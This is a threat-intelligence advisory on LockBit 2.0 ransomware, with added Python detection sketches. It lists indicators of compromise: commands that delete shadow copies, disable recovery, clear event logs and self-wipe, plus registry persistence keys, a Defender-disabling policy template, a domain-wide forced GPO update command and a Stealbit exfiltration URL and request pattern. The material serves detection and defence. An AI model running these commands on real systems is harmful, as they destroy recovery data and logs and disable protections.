Indicators of Compromise Associated with LockBit 2.0 Ransomware

Fortify Security Team
Feb 25, 2022

LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero day exploits.

After compromising a victim network, LockBit 2.0 actors use publicly available tools such as Mimikatz to escalate privileges. The threat actors then use both publicly available and custom tools to exfiltrate data, followed by encryption using the LockBit malware. The actors always leave a ransom note in each affected directory within victim systems, which provides instructions on how to obtain the decryption software. The ransom note also threatens to leak exfiltrated victim data on the LockBit 2.0 leak site and demands a ransom to avoid these actions.

In July 2021, LockBit 2.0 released an update which featured the automatic encryption of devices across Windows domains by abusing Active Directory group policies. In August 2021, LockBit 2.0 began to advertise for insiders to establish initial access into potential victim networks, while promising a portion of the proceeds from a successful attack. LockBit 2.0 also developed a Linux-based malware which takes advantage of vulnerabilities within VMware ESXi virtual machines.

Technical Details
LockBit 2.0 is best described as a heavily obfuscated ransomware application that leverages bitwise operations to decode strings and load required modules to evade detection. Upon launch, LockBit 2.0 decodes the necessary strings and code to import the required modules, then determines whether the process has administrative privileges. If privileges are not sufficient, it attempts to escalate to the required privileges. LockBit 2.0 then determines the system and user language settings and only targets those not matching a set list of Eastern European languages. If an Eastern European language is detected, the program exits without infection. As infection begins, LockBit 2.0 deletes log files and shadow copies residing on disk. LockBit 2.0 enumerates system information, including hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. LockBit 2.0 attempts to encrypt any data saved to any local or remote device but skips files associated with core system functions. Once completed, LockBit 2.0 deletes itself from disk and creates persistence at startup.

Prior to encryption, LockBit affiliates primarily use the Stealbit application obtained directly from the LockBit panel to exfiltrate specific file types. The desired file types can be configured by the affiliate to tailor the attack to the victim. The affiliate configures the application to target a desired file path and, upon execution, the tool copies the files to an attacker-controlled server using HTTP. Due to the nature of the affiliate model, some attackers use other commercially available tools such as rclone and MEGAsync to achieve the same results. LockBit 2.0 actors often use publicly available file sharing services, including privatlab[.]net, nonfiles[.]com, sendspace[.]com, fex[.]net, transfer[.]sh, and send.exploit[.]in. While some of these applications and services can support legitimate purposes, they can also be used by threat actors to aid in system compromise or exploration of an enterprise.

Command Line Activity:
The activity below provides a listing of all observed command line activity during execution:
Recorded Commands
cmd.exe /c vssadmin Delete Shadows /All /Quiet
Description: Deletes Shadow Copies
cmd.exe /c bcdedit /set {default} recoveryenabled No
Description: Disables Win 10 recovery
cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
Description: Ignore boot failures
cmd.exe /c wmic SHADOWCOPY /nointeractive
Description: This command has an invalid syntax and errors out
cmd.exe /c wevtutil cl security
Description: Deletes security log
cmd.exe /c wevtutil cl system
Description: Deletes system log
cmd.exe /c wevtutil cl application
Description: Deletes application log
cmd.exe "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 >Nul&fsutil file setZeroData offset=0 length=524288 "C:\Users\fred\Desktop\Lsystem-234-bit.exe" & Del /f /q "C:\Users\fred\Desktop\Lsystem-234-bit.exe"
Description: Wipes and deletes itself
cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Description: Lockbit 2.0 deletes all shadow copies on disc to prevent data recovery
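
Detection sketch for the recorded commands above. This is an added example, not part of the original advisory: it matches the listed anti-recovery, log-clearing and self-wipe commands in process-creation command lines and reports hosts that show several of them. The rule names, host names, threshold and sample events are constructed for illustration.

```python
import re

# Patterns for the behaviours in the "Recorded Commands" list above.
# Rule names are labels chosen for this example.
RULES = {
    "shadow_copy_delete": r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"
                          r"|\bwmic(\.exe)?\s+shadowcopy\s+delete\b",
    "recovery_disabled": r"\bbcdedit(\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no\b",
    "boot_failures_ignored": r"\bbcdedit(\.exe)?\s+/set\s+\S+\s+bootstatuspolicy"
                             r"\s+ignoreallfailures\b",
    "event_log_cleared": r"\bwevtutil(\.exe)?\s+cl\s+(security|system|application)\b",
    "self_wipe": r"\bfsutil(\.exe)?\s+file\s+setzerodata\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def classify(cmdline):
    """Return the sorted rule names that match one command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))

def triage(events, threshold=2):
    """Group (host, cmdline) events by host and keep hosts that show at
    least `threshold` distinct behaviours, which separates the chained
    sequence in the list above from a single routine admin command."""
    seen = {}
    for host, cmdline in events:
        seen.setdefault(host, set()).update(classify(cmdline))
    return {h: sorted(r) for h, r in seen.items() if len(r) >= threshold}

# Constructed process-creation events (host names are made up).
SAMPLE_EVENTS = [
    ("WS-01", "cmd.exe /c vssadmin Delete Shadows /All /Quiet"),
    ("WS-01", "cmd.exe /c bcdedit /set {default} recoveryenabled No"),
    ("WS-01", "cmd.exe /c wevtutil cl security"),
    ("WS-02", "vssadmin list shadows"),        # read-only query, no match
    ("WS-02", "bcdedit /enum"),                # read-only query, no match
    ("SRV-03", "wevtutil cl application"),     # one behaviour only
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

The invalid "wmic SHADOWCOPY /nointeractive" command from the list is deliberately not matched by the shadow-copy rule, since it contains no delete verb.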

Registry Keys
Created – UAC Bypass
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\ICM\Calibration
Value: Display Calibrator
Data: <LockBit 2.0 Ransomware path>
Created – LockBit 2.0 Wallpaper Change
Key: HKEY_CLASSES_ROOT\Lockbit\shell\Open\Command
Data: "C:\Windows\system32\mshta.exe" "C:\Users\<username>\Desktop\LockBit_Ransomware.hta"
Key: HKEY_CLASSES_ROOT\Lockbit\DefaultIcon
Data: C:\Windows\<First 6 characters of LockBit 2.0 Decryption ID>.ico
Created – Persistence
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{GUID}
Data: C:\Users\<Username>\Desktop\LockBit_Ransomware.hta
Data: <LockBit 2.0 Ransomware path>
Created – Encryption
Key: HKEY_CURRENT_USER\Software\<LockBit 2.0 ID>\Private
Key: HKEY_CURRENT_USER\Software\<LockBit 2.0 ID>\Public
Created – LockBit 2.0 Icon Location
Key: HKEY_LOCAL_MACHINE\Software\Classes\.lockbit\DefaultIcon
Created / Modified – LockBit 2.0 Desktop
Key: HKEY_CURRENT_USER\Control Panel\Desktop
String Value: %APPDATA%\Local\Temp\<LockBit 2.0 wallpaper>.tmp.bmp
String Value: TileWallpaper=0
String Value: WallpaperStyle=2

Files Created
C:\Users\<Username>\Desktop\LockBit_Ransomware.hta – LockBit 2.0 hta File
C:\Windows\SysWOW64\<First 6 characters of Decryption ID>.ico – LockBit 2.0 Icon
C:\Users\<username>\AppData\Local\Temp\<LockBit 2.0 wallpaper>.tmp.bmp – LockBit 2.0 Wallpaper

Group Policy Update – Windows Defender Disable
[General]
Version=%s
displayName=%s
[Software\Policies\Microsoft\Windows Defender;DisableAntiSpyware]
[Software\Policies\Microsoft\Windows Defender\Real-Time Protection;DisableRealtimeMonitoring]
[Software\Policies\Microsoft\Windows Defender\Spynet;SubmitSamplesConsent]
[Software\Policies\Microsoft\Windows Defender\Threats;Threats_ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\UX Configuration;Notification_Suppress]

PowerShell Command – Force GPO Policy
powershell.exe -Command "Get-ADComputer -filter * -Searchbase '%s' | foreach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}"

Anti-Recovery Command
C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

LockBit 2.0 Extension
.lockbit

LockBit 2.0 Ransom Note
Restore-My-Files.txt

Stealbit
Analysis determined Stealbit is a heavily obfuscated application that uses bitwise operations to build strings and load required modules. The recorded behaviors and characteristics are outlined below, as of February 2022.

Example String decode routine used throughout Lockbit 2.0 and its associated programs:
IPs are decoded starting with the following bytes which are ANDed by the count stored in ECX.
Key: 0xF8 0x72 0x12 0x13 0xA6 0x25 0x3C 0xE3 0xF9 0x91 0x2E 0x18 0x20 0x22 0x76

IP Addresses

Stealbit URL Example
hxxp://185.182.193.120/06599379103BD9028AB56AE0EBED457D0

Network Indicators
After a host establishes a connection to one of the command and control servers, an HTTP PUT request with a hexadecimal value 32 or 33 characters long is sent to the command and control server.
For example, PUT /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1.
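
A check for this request shape over web proxy logs, as an added example that is not part of the original advisory. The log layout (timestamp, client, method, URL), the confidence labels and the sample lines are assumptions made for illustration; only the PUT method and the 32 or 33 character hexadecimal value come from the text above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A path that is exactly one segment of 32 or 33 hex characters.
# Accepting lower-case hex is an assumption; the page shows upper case.
HEX_PATH = re.compile(r"/[0-9A-Fa-f]{32,33}")

def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def check_request(method, url):
    """Return a confidence label for one request, or None if no match."""
    parts = urlsplit(url)
    if method.upper() != "PUT":
        return None
    if parts.query or not HEX_PATH.fullmatch(parts.path):
        return None
    # The page's URL example addresses the server by IP, so an IP-literal
    # host is ranked higher here (a weighting chosen for this example).
    return "high" if host_is_ip(parts.hostname or "") else "medium"

def scan(log_lines):
    """Parse 'timestamp client method url' lines and return the hits."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines
        _ts, client, method, url = fields
        label = check_request(method, url)
        if label:
            hits.append((client, url, label))
    return hits

# Constructed proxy log; addresses are from documentation ranges.
SAMPLE_LOG = [
    "2022-02-20T10:00:01Z 10.0.0.5 PUT http://192.0.2.10/06599379103BD9028AB56AE0EBED457D0",
    "2022-02-20T10:00:02Z 10.0.0.6 GET http://192.0.2.10/06599379103BD9028AB56AE0EBED457D0",
    "2022-02-20T10:00:03Z 10.0.0.7 PUT http://files.example.com/upload/report.pdf",
    "2022-02-20T10:00:04Z 10.0.0.8 PUT http://198.51.100.7/" + "A" * 40,
    "2022-02-20T10:00:05Z 10.0.0.9 PUT http://cdn.example.com/" + "0f" * 16,
]
```

Calling scan(SAMPLE_LOG) flags the first and last lines only; the GET, the multi-segment upload path and the 40-character value are near misses that the length and method checks exclude.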

Self-Delete Command
ping 127.0.0.7 -n 7 > Nul & fsutil file setZeroData offset=0 length=<Stealbit file size> <Stealbit file path> & Del /f /q <Stealbit executable>

Named Pipe
STEALBIT-MASTER-PIPE
